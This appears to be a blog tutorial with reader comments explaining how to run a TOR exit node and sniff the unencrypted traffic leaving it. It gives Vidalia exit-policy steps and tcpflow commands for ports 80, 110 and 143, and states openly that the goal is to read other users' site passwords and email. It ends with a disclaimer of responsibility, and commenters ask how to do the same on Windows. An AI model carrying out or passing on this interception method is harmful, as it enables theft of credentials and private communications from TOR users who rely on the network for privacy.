Wednesday, March 30, 2011

Intercepting TOR traffic to Sniff Passwords or other Data

For this tutorial, I recommend you have some decent tcp/ip knowledge.
UPDATED on 12th May 2018

For those of you who do not know what TOR is - it is an extremely powerful proxy project. TOR stands for 'The Onion Router'. It uses second-generation onion routing to hide your connection. TOR was originally sponsored by the US Naval Research Laboratory until it became an EFF project. TOR is completely free.

Onion routing works by relaying communications through a network of systems in various places. These systems are generally volunteers. Your connection travels through various nodes(it's encrypted) until it reaches the exit node, and then the location(ie the website you're connecting to via port 80).

This unencrypted connection on the exit node is what we will be exploiting.

Packet Sniffing:
The purpose of this post is to teach you how to sniff packets on a TOR network. TOR, like various other forms of hiding your identity, has its vulnerabilities. First of all, there's a chance your traffic could be passing through a government node as the onion routing takes place(unlikely, but still possible).

Now, TOR is highly encrypted when traveling from node to node, but once it leaves the final node, the connection is not encrypted(unless encryption is forced). This means, if you set up your network as a TOR EXIT node, you can then sniff traffic as it travels through your network - setting up a MITM(Man In The Middle) style attack.

To do this, you'll first need your connection to be a TOR exit node. So, let's get started. First off, you need to install Vidalia.

All Vidalia is, is a GUI for TOR, giving you easier control over things. Start by installing TOR and Vidalia, and set up your TOR connection. Download them here. Make sure you select the Vidalia bundle for your OS.

Once you have Vidalia installed, you need to configure it to become an exit node. To do this, you need to configure it so your connection acts as an exit node. You need to go to 'Setup Relaying' on the Vidalia GUI, and then find exit policies, and tick any of the boxes.

My advice would be only to allow the unencrypted HTTP and 'Retrieve Mail', as most other default ports that tor is being used are useless - either that or they are TLS encrypted.

Getting the data:
Now, let's get to work. If you're running a Linux distro, I'd suggest using TCP flow for this, download it here.

Once you have TCPflow installed, create a new directory, then open up a console session, use the cd command to cd to the new directory you made, switch over to the root account, then run the following commands in that directory(TCP flow is console-based):
tcpflow -i eth0 port 80

tcpflow -i eth0 port 110

tcpflow -i eth0 port 143
This will capture HTTP requests, POP3 emails, and IMAP emails. Open a new console window and use the following command to stop sniffing:
killall tcpflow
or of course, just use CTRL + C to kill the processes currently running in the terminal. If you want to have a play around with TCP flow, then there's a guide on how to use it here.

What you're doing with these commands, is sniffing the traffic that travels through your connection, allowing you to read and intercept the traffic of people using TOR, before it reaches the final destination. You'll be able to see useful information here, including people's passwords for site logins, and potentially sensitive email information.

If you're using Windows or another operating system, then try downloading Wireshark here. Unlike TCP flow, Wireshark is not console based, the whole thing has a GUI and it's fairly straightforward to use.

I suggest changing your exit policies, so you're running as an exit node ONLY when you want to sniff unencrypted traffic and gather data. Your ISP may not be too happy if people are viewing illegal content, using your connection as an exit node.

Use this knowledge wisely, and know that I don't advocate, nor should I be held responsible for misuse of this knowledge.


  1. is it possible to make the traffic fully encrypted?

  2. I dont have linux, how to make it work on windows?

    1. Read carefully, it also works on windows.

  3. If you put this into another Tor network, then you can leave yourself setup an an exit node all the time. For example: your home ISP + your cellular data Wifi hotspot.

    This really makes Tor not worth using and defeats the entire purpose. I bet there are more people doing this on Tor, than agencies spying on unencrypted ISP traffic. Just a matter of time before Tor loses its appeal.

  4. I read that Tor passes through multiple layers and that each layer only possesses the ability to remove 1 level of encryption so essentially as data passes from point a to b it is encrypted twice. A decrypts only the destination B and B is only able to decrypt the part telling to go to c and c has only the ability to route it to the final destination. So is packet sniffing then decrypting the information available on exit, such as credentials (logins, passwords etc..)? What would be necessary to decrypt both the origin and destination? Like how could B know that it originated at A and that it was headed to C?